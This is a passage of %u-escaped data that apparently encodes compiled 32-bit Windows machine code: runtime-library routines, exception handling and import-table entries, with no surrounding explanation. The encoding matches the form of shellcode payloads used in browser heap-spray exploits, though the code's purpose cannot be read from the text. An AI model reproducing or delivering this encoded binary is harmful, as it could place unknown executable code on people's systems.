u0843%u02e8%u0012%ub900%u0001%u0000%u438b%ue808%u1214%u0000%ub0eb%u8f64%u0005%u0000%u8300%u18c4%u5e5f%uc35b%u4c8b%u0424%u41f7%u0604%u0000%ub800%u0001%u0000%u3374%u448b%u0824%u488b%u3308%ue8c8%udb82%uffff%u8b55%u1868%u70ff%uff0c%u1070%u70ff%ue814%uff3e%uffff%uc483%u5d0c%u448b%u0824%u548b%u1024%u0289%u03b8%u0000%uc300%u8b55%u244c%u8b08%uff29%u1c71%u71ff%uff18%u2871%u15e8%uffff%u83ff%u0cc4%uc25d%u0004%u5655%u5357%uea8b%uc033%udb33%ud233%uf633%uff33%ud1ff%u5f5b%u5d5e%u8bc3%u8bea%u8bf1%u6ac1%ue801%u115f%u0000%uc033%udb33%uc933%ud233%uff33%ue6ff%u8b55%u53ec%u5756%u006a%u006a%ubf68%u4068%u5100%ue5e8%u0015%u5f00%u5b5e%uc35d%u8b55%u246c%u5208%uff51%u2474%ue814%ufeb4%uffff%uc483%u5d0c%u08c2%u8b00%u55ff%uec8b%uec81%u0328%u0000%ud0a3%u40b3%u8900%ucc0d%u40b3%u8900%uc815%u40b3%u8900%uc41d%u40b3%u8900%uc035%u40b3%u8900%ubc3d%u40b3%u6600%u158c%ub3e8%u0040%u8c66%udc0d%u40b3%u6600%u1d8c%ub3b8%u0040%u8c66%ub405%u40b3%u6600%u258c%ub3b0%u0040%u8c66%uac2d%u40b3%u9c00%u058f%ub3e0%u0040%u458b%ua300%ub3d4%u0040%u458b%ua304%ub3d8%u0040%u458d%ua308%ub3e4%u0040%u858b%ufce0%uffff%u05c7%ub320%u0040%u0001%u0001%ud8a1%u40b3%ua300%ub2d4%u0040%u05c7%ub2c8%u0040%u0409%uc000%u05c7%ub2cc%u0040%u0001%u0000%ub4a1%u40a8%u8900%ud885%ufffc%ua1ff%ua8b8%u0040%u8589%ufcdc%uffff%u15ff%u802c%u0040%u18a3%u40b3%u6a00%ue801%uda0a%uffff%u6a59%uff00%u7815%u4080%u6800%u927c%u0040%u15ff%u8074%u0040%u3d83%ub318%u0040%u7500%u6a08%ue801%ud9e6%uffff%u6859%u0409%uc000%u15ff%u8070%u0040%uff50%u6c15%u4080%uc900%u55c3%uec8b%uec83%u8904%ufc7d%u7d8b%u8b08%u0c4d%ue9c1%u6607%uef0f%uebc0%u8d08%u24a4%u0000%u0000%u6690%u7f0f%u6607%u7f0f%u1047%u0f66%u477f%u6620%u7f0f%u3047%u0f66%u477f%u6640%u7f0f%u5047%u0f66%u477f%u6660%u7f0f%u7047%ubf8d%u0080%u0000%u7549%u8bd0%ufc7d%ue58b%uc35d%u8b55%u83ec%u10ec%u7d89%u8bfc%u0845%u8b99%u33f8%u2bfa%u83fa%u0fe7%ufa33%ufa2b%uff85%u3c75%u4d8b%u8b10%u83d1%u7fe2%u5589%u3bf4%u74ca%u2b12%u51ca%ue850%uff73%uffff%uc483%u8b08%u0845%u558b%u85f4%u74d2%u0345%u1045%uc22b%u4589%u33f8%u8bc0%uf87d%u4d8b%uf3f4%u8baa%u0845%u2eeb%udff7%uc783%u8910%uf07d%uc033%u7d8b%u8b08%uf04d%uaaf3%u458b%u8bf0%u084d%u558b%u0310%u2bc8%u52d0%u006a%ue851%uff7e%uffff%uc483%u8b0c%u0845%u7d8b%u8bfc%u5de5%u6ac3%u680c%u9750%u0040%u5de8%uffd6%u83ff%ufc65%u6600%u280f%uc7c1%ue445%u0001%u0000%u23eb%u458b%u8bec%u8b00%u3d00%u0005%uc000%u0a74%u1d3d%u0000%u74c0%u3303%uc3c0%uc033%uc340%u658b%u83e8%ue465%uc700%ufc45%ufffe%uffff%u458b%ue8e4%ud65f%uffff%u8bc3%u55ff%uec8b%uec83%u3318%u53c0%u4589%u89fc%uf445%u4589%u53f8%u589c%uc88b%u0035%u2000%u5000%u9c9d%u2b5a%u74d1%u511f%u339d%u0fc0%u89a2%uf445%u5d89%u89e8%uec55%u4d89%ub8f0%u0001%u0000%ua20f%u5589%u89fc%uf845%uf75b%ufc45%u0000%u0400%u0e74%u5ce8%uffff%u85ff%u74c0%u3305%u40c0%u02eb%uc033%uc95b%ue8c3%uff99%uffff%ub0a3%u40b6%u3300%uc3c0%uff8b%u8b55%u83ec%u0cec%ub4a1%u40a8%u3300%u89c5%ufc45%u066a%u458d%u50f4%u0468%u0010%uff00%u0875%u45c6%u00fa%u15ff%u8114%u0040%uc085%u0575%uc883%uebff%u8d0a%uf445%ue850%u07e5%u0000%u8b59%ufc4d%ucd33%uede8%uffd7%uc9ff%u8bc3%u55ff%uec8b%uec83%ua134%ua8b4%u0040%uc533%u4589%u8bfc%u1045%u4d8b%u8918%ud845%u458b%u5314%u4589%u8bd0%u5600%u4589%u8bdc%u0845%u3357%u89ff%ucc4d%u7d89%u89e0%ud47d%u453b%u0f0c%u5f84%u0001%u8b00%u7c35%u4080%u8d00%ue84d%u5051%ud6ff%u1d8b%u80fc%u0040%uc085%u5e74%u7d83%u01e8%u5875%u458d%u50e8%u75ff%uff0c%u85d6%u74c0%u834b%ue87d%u7501%u8b45%udc75%u45c7%u01d4%u0000%u8300%ufffe%u0c75%u75ff%ue8d8%ue7aa%uffff%uf08b%u4659%uf73b%u5b7e%ufe81%ufff0%u7fff%u5377%u448d%u0836%u003d%u0004%u7700%ue82f%u022a%u0000%uc48b%uc73b%u3874%u00c7%ucccc%u0000%u2deb%u5757%u75ff%uffdc%ud875%u016a%u75ff%uff08%u8bd3%u3bf0%u75f7%u33c3%ue9c0%u00d1%u0000%ue850%u012c%u0000%u3b59%u74c7%uc709%udd00%u00dd%u8300%u08c0%u4589%uebe4%u8903%ue47d%u7d39%u74e4%u8dd8%u3604%u5750%u75ff%ue8e4%ud702%uffff%uc483%u560c%u75ff%uffe4%udc75%u75ff%u6ad8%uff01%u0875%ud3ff%uc085%u7f74%u5d8b%u3bcc%u74df%u571d%uff57%u1c75%u5653%u75ff%u57e4%u75ff%uff0c%uc415%u4080%u8500%u74c0%u8960%ue05d%u5beb%u1d8b%u80c4%u0040%u7d39%u75d4%u5714%u5757%u5657%u75ff%u57e4%u75ff%uff0c%u8bd3%u3bf0%u74f7%u563c%u016a%ua1e8%uffdf%u59ff%u8959%ue045%uc73b%u2b74%u5757%u5056%uff56%ue475%uff57%u0c75%ud3ff%uc73b%u0e75%u75ff%ue8e0%udeab%uffff%u8959%ue07d%u0beb%u7d83%uffdc%u0574%u4d8b%u89d0%uff01%ue475%udde8%uffd6%u59ff%u458b%u8de0%uc065%u5e5f%u8b5b%ufc4d%ucd33%u39e8%uffd6%uc9ff%u6ac3%u680c%u9770%u0040%ua1e8%uffd3%u83ff%ue465%u8b00%u0875%u353b%ub6bc%u0040%u2277%u046a%u27e8%uffde%u59ff%u6583%u00fc%ue856%uf6f1%uffff%u8959%ue445%u45c7%ufefc%uffff%ue8ff%u0009%u0000%u458b%ue8e4%ud3ad%uffff%u6ac3%ue804%udd22%uffff%uc359%uff8b%u8b55%u56ec%u758b%u8308%ue0fe%u870f%u00a1%u0000%u5753%u3d8b%u8060%u0040%u3d83%ub11c%u0040%u7500%ue818%uca61%uffff%u1e6a%uafe8%uffc8%u68ff%u00ff%u0000%uf1e8%uffc5%u59ff%ua159%ub6d4%u0040%uf883%u7501%u850e%u74f6%u8b04%uebc6%u3303%u40c0%ueb50%u831c%u03f8%u0b75%ue856%uff53%uffff%u8559%u75c0%u8516%u75f6%u4601%uc683%u830f%uf0e6%u6a56%uff00%u1c35%u40b1%uff00%u8bd7%u85d8%u75db%u6a2e%u5e0c%u0539%ub6a8%u0040%u1574%u75ff%ue808%uec17%uffff%u8559%u74c0%u8b0f%u0875%u7be9%uffff%ue8ff%ub392%uffff%u3089%u8be8%uffb3%u89ff%u5f30%uc38b%ueb5b%u5614%uf0e8%uffeb%u59ff%u77e8%uffb3%uc7ff%u0c00%u0000%u3300%u5ec0%uc35d%ucccc%ucccc%u8d51%u244c%u2b08%u83c8%u0fe1%uc103%uc91b%uc10b%ue959%u0b6a%u0000%u8d51%u244c%u2b08%u83c8%u07e1%uc103%uc91b%uc10b%ue959%u0b54%u0000%u0c6a%u9068%u4097%ue800%ud258%uffff%u4d8b%u3308%u3bff%u76cf%u6a2e%u58e0%ud233%uf1f7%u453b%u1b0c%u40c0%u1f75%u13e8%uffb3%uc7ff%u0c00%u0000%u5700%u5757%u5757%u9be8%uffb2%u83ff%u14c4%uc033%ud5e9%u0000%u0f00%u4daf%u8b0c%u89f1%u0875%uf73b%u0375%uf633%u3346%u89db%ue45d%ufe83%u77e0%u8369%ud43d%u40b6%u0300%u4b75%uc683%u830f%uf0e6%u7589%u8b0c%u0845%u053b%ub6bc%u0040%u3777%u046a%u7fe8%uffdc%u59ff%u7d89%ufffc%u0875%u48e8%ufff5%u59ff%u4589%uc7e4%ufc45%ufffe%uffff%u5fe8%u0000%u8b00%ue45d%udf3b%u1174%u75ff%u5708%ue853%ud456%uffff%uc483%u3b0c%u75df%u5661%u086a%u35ff%ub11c%u0040%u15ff%u8060%u0040%ud88b%udf3b%u4c75%u3d39%ub6a8%u0040%u3374%ue856%uead7%uffff%u8559%u0fc0%u7285%uffff%u8bff%u1045%uc73b%u840f%uff50%uffff%u00c7%u000c%u0000%u45e9%uffff%u33ff%u8bff%u0c75%u046a%u23e8%uffdb%u59ff%u3bc3%u75df%u8b0d%u1045%uc73b%u0674%u00c7%u000c%u0000%uc38b%u8ce8%uffd1%uc3ff%u106a%ub068%u4097%ue800%ud13a%uffff%u5d8b%u8508%u75db%uff0e%u0c75%ucde8%ufffd%u59ff%ucce9%u0001%u8b00%u0c75%uf685%u0c75%ue853%udbe7%uffff%ue959%u01b7%u0000%u3d83%ub6d4%u0040%u0f03%u9385%u0001%u3300%u89ff%ue47d%ufe83%u0fe0%u8a87%u0001%u6a00%ue804%udb8c%uffff%u8959%ufc7d%ue853%uec78%uffff%u8959%ue045%uc73b%u840f%u009e%u0000%u353b%ub6bc%u0040%u4977%u5356%ue850%uf15a%uffff%uc483%u850c%u74c0%u8905%ue45d%u35eb%ue856%uf429%uffff%u8959%ue445%uc73b%u2774%u438b%u48fc%uc63b%u0272%uc68b%u5350%u75ff%ue8e4%udffc%uffff%ue853%uec28%uffff%u4589%u53e0%ue850%uec4e%uffff%uc483%u3918%ue47d%u4875%uf73b%u0675%uf633%u8946%u0c75%uc683%u830f%uf0e6%u7589%u560c%uff57%u1c35%u40b1%uff00%u6015%u4080%u8900%ue445%uc73b%u2074%u438b%u48fc%uc63b%u0272%uc68b%u5350%u75ff%ue8e4%udfa8%uffff%uff53%ue075%u01e8%uffec%u83ff%u14c4%u45c7%ufefc%uffff%ue8ff%u002e%u0000%u7d83%u00e0%u3175%uf685%u0175%u8346%u0fc6%ue683%u89f0%u0c75%u5356%u006a%u35ff%ub11c%u0040%u15ff%u8058%u0040%uf88b%u12eb%u758b%u8b0c%u085d%u046a%ubde8%uffd9%u59ff%u8bc3%ue47d%uff85%u850f%u00bf%u0000%u3d39%ub6a8%u0040%u2c74%ue856%ue92b%uffff%u8559%u0fc0%ud285%ufffe%ue8ff%ub0aa%uffff%u7d39%u75e0%u8b6c%ufff0%u1815%u4080%u5000%u55e8%uffb0%u59ff%u0689%u5feb%uff85%u850f%u0083%u0000%u85e8%uffb0%u39ff%ue07d%u6874%u00c7%u000c%u0000%u71eb%uf685%u0175%u5646%u6a53%uff00%u1c35%u40b1%uff00%u5815%u4080%u8b00%u85f8%u75ff%u3956%ua805%u40b6%u7400%u5634%uc2e8%uffe8%u59ff%uc085%u1f74%ufe83%u76e0%u56cd%ub2e8%uffe8%u59ff%u39e8%uffb0%uc7ff%u0c00%u0000%u3300%ue8c0%ucf99%uffff%ue8c3%ub026%uffff%u7ce9%uffff%u85ff%u75ff%ue816%ub018%uffff%uf08b%u15ff%u8018%u0040%ue850%uafc8%uffff%u0689%u8b59%uebc7%u8bd2%u55ff%uec8b%uec83%uff10%u0c75%u4d8d%ue8f0%uab07%uffff%ub60f%u0845%u4d8b%u8bf0%uc889%u0000%u0f00%u04b7%u2541%u8000%u0000%u7d80%u00fc%u0774%u4d8b%u83f8%u7061%uc9fd%u55c3%uec8b%uec83%u8908%ufc7d%u7589%u8bf8%u0c75%u7d8b%u8b08%u104d%ue9c1%ueb07%u8d06%u009b%u0000%u6600%u6f0f%u6606%u6f0f%u104e%u0f66%u566f%u6620%u6f0f%u305e%u0f66%u077f%u0f66%u4f7f%u6610%u7f0f%u2057%u0f66%u5f7f%u6630%u6f0f%u4066%u0f66%u6e6f%u6650%u6f0f%u6076%u0f66%u7e6f%u6670%u7f0f%u4067%u0f66%u6f7f%u6650%u7f0f%u6077%u0f66%u7f7f%u8d70%u80b6%u0000%u8d00%u80bf%u0000%u4900%ua375%u758b%u8bf8%ufc7d%ue58b%uc35d%u8b55%u83ec%u1cec%u7d89%u89f4%uf875%u5d89%u8bfc%u0c5d%uc38b%u8b99%u8bc8%u0845%uca33%uca2b%ue183%u330f%u2bca%u99ca%uf88b%ufa33%ufa2b%ue783%u330f%u2bfa%u8bfa%u0bd1%u75d7%u8b4a%u1075%uce8b%ue183%u897f%ue84d%uf13b%u1374%uf12b%u5356%ue850%uff27%uffff%uc483%u8b0c%u0845%u4d8b%u85e8%u74c9%u8b77%u105d%u558b%u030c%u2bd3%u89d1%uec55%ud803%ud92b%u5d89%u8bf0%uec75%u7d8b%u8bf0%ue84d%ua4f3%u458b%ueb08%u3b53%u75cf%uf735%u83d9%u10c1%u4d89%u8be4%u0c75%u7d8b%u8b08%ue44d%ua4f3%u4d8b%u0308%ue44d%u558b%u030c%ue455%u458b%u2b10%ue445%u5250%ue851%uff4c%uffff%uc483%u8b0c%u0845%u1aeb%u758b%u8b0c%u087d%u4d8b%u8b10%uc1d1%u02e9%ua5f3%uca8b%ue183%uf303%u8ba4%u0845%u5d8b%u8bfc%uf875%u7d8b%u8bf4%u5de5%u8bc3%u55ff%uec8b%u0a6a%u006a%u75ff%ue808%u08c2%u0000%uc483%u5d0c%u8bc3%u55ff%uec8b%uec81%u0328%u0000%ub4a1%u40a8%u3300%u89c5%ufc45%u05f6%uabd0%u0040%u5601%u0874%u0a6a%ucde8%uffc2%u59ff%u39e8%uffe4%u85ff%u74c0%u6a08%ue816%ue43b%uffff%uf659%ud005%u40ab%u0200%u840f%u00ca%u0000%u8589%ufde0%uffff%u8d89%ufddc%uffff%u9589%ufdd8%uffff%u9d89%ufdd4%uffff%ub589%ufdd0%uffff%ubd89%ufdcc%uffff%u8c66%uf895%ufffd%u66ff%u8d8c%ufdec%uffff%u8c66%uc89d%ufffd%u66ff%u858c%ufdc4%uffff%u8c66%uc0a5%ufffd%u66ff%uad8c%ufdbc%uffff%u8f9c%uf085%ufffd%u8bff%u0475%u458d%u8904%uf485%ufffd%uc7ff%u3085%ufffd%u01ff%u0100%u8900%ue8b5%ufffd%u8bff%ufc40%u506a%u8589%ufde4%uffff%u858d%ufcd8%uffff%u006a%ue850%ucf44%uffff%u858d%ufcd8%uffff%uc483%u890c%u2885%ufffd%u8dff%u3085%ufffd%u6aff%uc700%ud885%ufffc%u15ff%u0000%u8940%ue4b5%ufffc%u89ff%u2c85%ufffd%uffff%u7815%u4080%u8d00%u2885%ufffd%u50ff%u15ff%u8074%u0040%u036a%u5be8%uffc1%uccff%u106a%ud068%u4097%ue800%ucc50%uffff%uc033%u5d8b%u3308%u3bff%u0fdf%uc095%uc73b%u1d75%u13e8%uffad%uc7ff%u1600%u0000%u5700%u5757%u5757%u9be8%uffac%u83ff%u14c4%uc883%uebff%u8353%ud43d%u40b6%u0300%u3875%u046a%uafe8%uffd6%u59ff%u7d89%u53fc%u9be8%uffe7%u59ff%u4589%u3be0%u74c7%u8b0b%ufc73%uee83%u8909%ue475%u03eb%u758b%uc7e4%ufc45%ufffe%uffff%u25e8%u0000%u3900%ue07d%u1075%u5753%u35ff%ub11c%u0040%u15ff%u8050%u0040%uf08b%uc68b%u10e8%uffcc%uc3ff%uff33%u5d8b%u8b08%ue475%u046a%u7de8%uffd5%u59ff%u6ac3%ue802%ube2a%uffff%uc359%u8b55%u57ec%u8b56%u0c75%u4d8b%u8b10%u087d%uc18b%ud18b%uc603%ufe3b%u0876%uf83b%u820f%u01a4%u0000%uf981%u0100%u0000%u1f72%u3d83%ub6b0%u0040%u7400%u5716%u8356%u0fe7%ue683%u3b0f%u5efe%u755f%u5e08%u5d5f%ufde9%ufffc%uf7ff%u03c7%u0000%u7500%uc115%u02e9%ue283%u8303%u08f9%u2a72%ua5f3%u24ff%uf495%u4076%u9000%uc78b%u03ba%u0000%u8300%u04e9%u0c72%ue083%u0303%uffc8%u8524%u7608%u0040%u24ff%u048d%u4077%u9000%u24ff%u888d%u4076%u9000%u7618%u0040%u7644%u0040%u7668%u0040%ud123%u068a%u0788%u468a%u8801%u0147%u468a%uc102%u02e9%u4788%u8302%u03c6%uc783%u8303%u08f9%ucc72%ua5f3%u24ff%uf495%u4076%u8d00%u0049%ud123%u068a%u0788%u468a%uc101%u02e9%u4788%u8301%u02c6%uc783%u8302%u08f9%ua672%ua5f3%u24ff%uf495%u4076%u9000%ud123%u068a%u0788%uc683%uc101%u02e9%uc783%u8301%u08f9%u8872%ua5f3%u24ff%uf495%u4076%u8d00%u0049%u76eb%u0040%u76d8%u0040%u76d0%u0040%u76c8%u0040%u76c0%u0040%u76b8%u0040%u76b0%u0040%u76a8%u0040%u448b%ue48e%u4489%ue48f%u448b%ue88e%u4489%ue88f%u448b%uec8e%u4489%uec8f%u448b%uf08e%u4489%uf08f%u448b%uf48e%u4489%uf48f%u448b%uf88e%u4489%uf88f%u448b%ufc8e%u4489%ufc8f%u048d%u008d%u0000%u0300%u03f0%ufff8%u9524%u76f4%u0040%uff8b%u7704%u0040%u770c%u0040%u7718%u0040%u772c%u0040%u458b%u5e08%uc95f%u90c3%u068a%u0788%u458b%u5e08%uc95f%u90c3%u068a%u0788%u468a%u8801%u0147%u458b%u5e08%uc95f%u8dc3%u0049%u068a%u0788%u468a%u8801%u0147%u468a%u8802%u0247%u458b%u5e08%uc95f%u90c3%u748d%ufc31%u7c8d%ufc39%uc7f7%u0003%u0000%u2475%ue9c1%u8302%u03e2%uf983%u7208%ufd0d%ua5f3%ufffc%u9524%u7890%u0040%uff8b%ud9f7%u24ff%u408d%u4078%u8d00%u0049%uc78b%u03ba%u0000%u8300%u04f9%u0c72%ue083%u2b03%uffc8%u8524%u7794%u0040%u24ff%u908d%u4078%u9000%u77a4%u0040%u77c8%u0040%u77f0%u0040%u468a%u2303%u88d1%u0347%uee83%uc101%u02e9%uef83%u8301%u08f9%ub272%uf3fd%ufca5%u24ff%u9095%u4078%u8d00%u0049%u468a%u2303%u88d1%u0347%u468a%uc102%u02e9%u4788%u8302%u02ee%uef83%u8302%u08f9%u8872%uf3fd%ufca5%u24ff%u9095%u4078%u9000%u468a%u2303%u88d1%u0347%u468a%u8802%u0247%u468a%uc101%u02e9%u4788%u8301%u03ee%uef83%u8303%u08f9%u820f%uff56%uffff%uf3fd%ufca5%u24ff%u9095%u4078%u8d00%u0049%u7844%u0040%u784c%u0040%u7854%u0040%u785c%u0040%u7864%u0040%u786c%u0040%u7874%u0040%u7887%u0040%u448b%u1c8e%u4489%u1c8f%u448b%u188e%u4489%u188f%u448b%u148e%u4489%u148f%u448b%u108e%u4489%u108f%u448b%u0c8e%u4489%u0c8f%u448b%u088e%u4489%u088f%u448b%u048e%u4489%u048f%u048d%u008d%u0000%u0300%u03f0%ufff8%u9524%u7890%u0040%uff8b%u78a0%u0040%u78a8%u0040%u78b8%u0040%u78cc%u0040%u458b%u5e08%uc95f%u90c3%u468a%u8803%u0347%u458b%u5e08%uc95f%u8dc3%u0049%u468a%u8803%u0347%u468a%u8802%u0247%u458b%u5e08%uc95f%u90c3%u468a%u8803%u0347%u468a%u8802%u0247%u468a%u8801%u0147%u458b%u5e08%uc95f%uccc3%ucccc%u8b55%u53ec%u5756%u6a55%u6a00%u6800%u7900%u0040%u75ff%ue808%u05a4%u0000%u5f5d%u5b5e%ue58b%uc35d%u4c8b%u0424%u41f7%u0604%u0000%ub800%u0001%u0000%u3274%u448b%u1424%u488b%u33fc%ue8c8%uca92%uffff%u8b55%u1068%u508b%u5228%u508b%u5224%u14e8%u0000%u8300%u08c4%u8b5d%u2444%u8b08%u2454%u8910%ub802%u0003%u0000%u53c3%u5756%u448b%u1024%u5055%ufe6a%u0868%u4079%u6400%u35ff%u0000%u0000%ub4a1%u40a8%u3300%u50c4%u448d%u0424%ua364%u0000%u0000%u448b%u2824%u588b%u8b08%u0c70%ufe83%u74ff%u833a%u247c%uff2c%u0674%u743b%u2c24%u2d76%u348d%u8b76%ub30c%u4c89%u0c24%u4889%u830c%ub37c%u0004%u1775%u0168%u0001%u8b00%ub344%ue808%u0049%u0000%u448b%u08b3%u5fe8%u0000%ueb00%u8bb7%u244c%u6404%u0d89%u0000%u0000%uc483%u5f18%u5b5e%u33c3%u64c0%u0d8b%u0000%u0000%u7981%u0804%u4079%u7500%u8b10%u0c51%u528b%u390c%u0851%u0575%u01b8%u0000%uc300%u5153%ue0bb%u40ab%ueb00%u530b%ubb51%uabe0%u0040%u4c8b%u0c24%u4b89%u8908%u0443%u6b89%u550c%u5051%u5958%u595d%uc25b%u0004%ud0ff%uccc3%u8d51%u244c%u2b04%u1bc8%uf7c0%u23d0%u8bc8%u25c4%uf000%uffff%uc83b%u0a72%uc18b%u9459%u008b%u0489%uc324%u002d%u0010%u8500%ueb00%u8be9%u55ff%uec8b%uec83%u5614%uff57%u0875%u4d8d%ue8ec%ua2bf%uffff%u458b%u8b10%u0c75%uff33%uc73b%u0274%u3089%uf73b%u2c75%u91e8%uffa7%u57ff%u5757%u5757%u00c7%u0016%u0000%u19e8%uffa7%u83ff%u14c4%u7d80%u00f8%u0774%u458b%u83f4%u7060%u33fd%ue9c0%u01d8%u0000%u7d39%u7414%u830c%u147d%u7c02%u83c9%u147d%u7f24%u8bc3%uec4d%u8a53%u891e%ufc7d%u7e8d%u8301%uacb9%u0000%u0100%u177e%u458d%u50ec%ub60f%u6ac3%u5008%ue2e8%u0002%u8b00%uec4d%uc483%ueb0c%u8b10%uc891%u0000%u0f00%uc3b6%ub70f%u4204%ue083%u8508%u74c0%u8a05%u471f%uc7eb%ufb80%u752d%u8306%u184d%ueb02%u8005%u2bfb%u0375%u1f8a%u8b47%u1445%uc085%u8c0f%u014b%u0000%uf883%u0f01%u4284%u0001%u8300%u24f8%u8f0f%u0139%u0000%uc085%u2a75%ufb80%u7430%uc709%u1445%u000a%u0000%u34eb%u078a%u783c%u0d74%u583c%u0974%u45c7%u0814%u0000%ueb00%uc721%u1445%u0010%u0000%u0aeb%uf883%u7510%u8013%u30fb%u0e75%u078a%u783c%u0474%u583c%u0475%u8a47%u471f%ub18b%u00c8%u0000%uffb8%uffff%u33ff%uf7d2%u1475%ub60f%u0fcb%u0cb7%uf64e%u04c1%u0874%ube0f%u83cb%u30e9%u1beb%uc1f7%u0103%u0000%u3174%ucb8a%ue980%u8061%u19f9%ube0f%u77cb%u8303%u20e9%uc183%u3bc9%u144d%u1973%u4d83%u0818%u4539%u72fc%u7527%u3b04%u76ca%u8321%u184d%u8304%u107d%u7500%u8b23%u1845%ua84f%u7508%u8320%u107d%u7400%u8b03%u0c7d%u6583%u00fc%u5beb%u5d8b%u0ffc%u5daf%u0314%u89d9%ufc5d%u1f8a%ueb47%ube8b%uffff%u7fff%u04a8%u1b75%u01a8%u3d75%ue083%u7402%u8109%ufc7d%u0000%u8000%u0977%uc085%u2b75%u7539%u76fc%ue826%ua5f0%uffff%u45f6%u0118%u00c7%u0022%u0000%u0674%u4d83%ufffc%u0feb%u45f6%u0218%u006a%u0f58%uc095%uc603%u4589%u8bfc%u1045%uc085%u0274%u3889%u45f6%u0218%u0374%u5df7%u80fc%uf87d%u7400%u8b07%uf445%u6083%ufd70%u458b%uebfc%u8b18%u1045%uc085%u0274%u3089%u7d80%u00f8%u0774%u458b%u83f4%u7060%u33fd%u5bc0%u5e5f%uc3c9%uff8b%u8b55%u33ec%u50c0%u75ff%uff10%u0c75%u75ff%u3908%u8c05%u40ac%u7500%u6807%ua790%u0040%u01eb%ue850%ufdab%uffff%uc483%u5d14%uccc3%ucccc%ucccc%ucccc%ucccc%ucccc%u8b55%u57ec%u5356%u4d8b%u0b10%u74c9%u8b4d%u0875%u7d8b%ub70c%ub341%ub65a%u8d20%u0049%u268a%ue40a%u078a%u2774%uc00a%u2374%uc683%u8301%u01c7%ue73a%u0672%ue33a%u0277%ue602%uc73a%u0672%uc33a%u0277%uc602%ue03a%u0b75%ue983%u7501%u33d1%u3ac9%u74e0%ub909%uffff%uffff%u0272%ud9f7%uc18b%u5e5b%uc95f%uccc3%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%u8b56%u2444%u0b14%u75c0%u8b28%u244c%u8b10%u2444%u330c%uf7d2%u8bf1%u8bd8%u2444%uf708%u8bf1%u8bf0%uf7c3%u2464%u8b10%u8bc8%uf7c6%u2464%u0310%uebd1%u8b47%u8bc8%u245c%u8b10%u2454%u8b0c%u2444%ud108%ud1e9%ud1db%ud1ea%u0bd8%u75c9%uf7f4%u8bf3%uf7f0%u2464%u8b14%u8bc8%u2444%uf710%u03e6%u72d1%u3b0e%u2454%u770c%u7208%u3b0f%u2444%u7608%u4e09%u442b%u1024%u541b%u1424%udb33%u442b%u0824%u541b%u0c24%udaf7%ud8f7%uda83%u8b00%u8bca%u8bd3%u8bd9%u8bc8%u5ec6%u10c2%u8b00%u55ff%uec8b%uec83%u5318%u75ff%u8d10%ue84d%u56e8%uff9f%u8bff%u085d%u438d%u3d01%u0100%u0000%u0f77%u458b%u8be8%uc880%u0000%u0f00%u04b7%ueb58%u8975%u085d%u7dc1%u0808%u458d%u50e8%u458b%u2508%u00ff%u0000%ue850%uf407%uffff%u5959%uc085%u1274%u458a%u6a08%u8802%uf845%u5d88%uc6f9%ufa45%u5900%u0aeb%uc933%u5d88%uc6f8%uf945%u4100%u458b%u6ae8%uff01%u1470%u70ff%u8d04%ufc45%u5150%u458d%u50f8%u458d%u6ae8%u5001%ucfe8%uffcb%u83ff%u20c4%uc085%u1075%u4538%u74f4%u8b07%uf045%u6083%ufd70%uc033%u14eb%ub70f%ufc45%u4523%u800c%uf47d%u7400%u8b07%uf04d%u6183%ufd70%uc95b%uccc3%ucccc%u448b%u0824%u4c8b%u1024%uc80b%u4c8b%u0c24%u0975%u448b%u0424%ue1f7%u10c2%u5300%ue1f7%ud88b%u448b%u0824%u64f7%u1424%ud803%u448b%u0824%ue1f7%ud303%uc25b%u0010%u25ff%u8054%u0040%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u9aae%u0000%u9a9e%u0000%u9a8c%u0000%u9ac0%u0000%u0000%u0000%u99d2%u0000%u99e4%u0000%u99f4%u0000%u9a06%u0000%u9a16%u0000%u99c4%u0000%u9a3c%u0000%u9a50%u0000%u9a60%u0000%u9a70%u0000%u99bc%u0000%u99a4%u0000%u9996%u0000%u9a2c%u0000%u9988%u0000%u9e8a%u0000%u9e7e%u0000%u9e70%u0000%u9e60%u0000%u9e54%u0000%u9e2c%u0000%u9ae8%u0000%u9afa%u0000%u9b0e%u0000%u9b22%u0000%u9b3e%u0000%u9b5c%u0000%u9b68%u0000%u9b80%u0000%u9b98%u0000%u9ba2%u0000%u9bae%u0000%u9bc0%u0000%u9bd4%u0000%u9be2%u0000%u9bee%u0000%u9bfc%u0000%u9c06%u0000%u9c16%u0000%u9c2c%u0000%u9c38%u0000%u9c48%u0000%u9c62%u0000%u9c7a%u0000%u9c94%u0000%u9caa%u0000%u9cc4%u0000%u9cd6%u0000%u9ce4%u0000%u9cf6%u0000%u9d0e%u0000%u9d1c%u0000%u9d2a%u0000%u9d36%u0000%u9d50%u0000%u9d60%u0000%u9d76%u0000%u9d90%u0000%u9da0%u0000%u9db6%u0000%u9dc6%u0000%u9dd8%u0000%u9dea%u0000%u9e02%u0000%u9e1a%u0000%u0000%u0000%u0039%u8000%u0004%u8000%u000c%u8000%u0073%u8000%u0009%u8000%u0074%u8000%u0010%u8000%u0017%u8000%u0003%u8000%u0034%u8000%u0013%u8000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u29b3%u0040%u55d4%u0040%u6b79%u0040%u336a%u0040%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000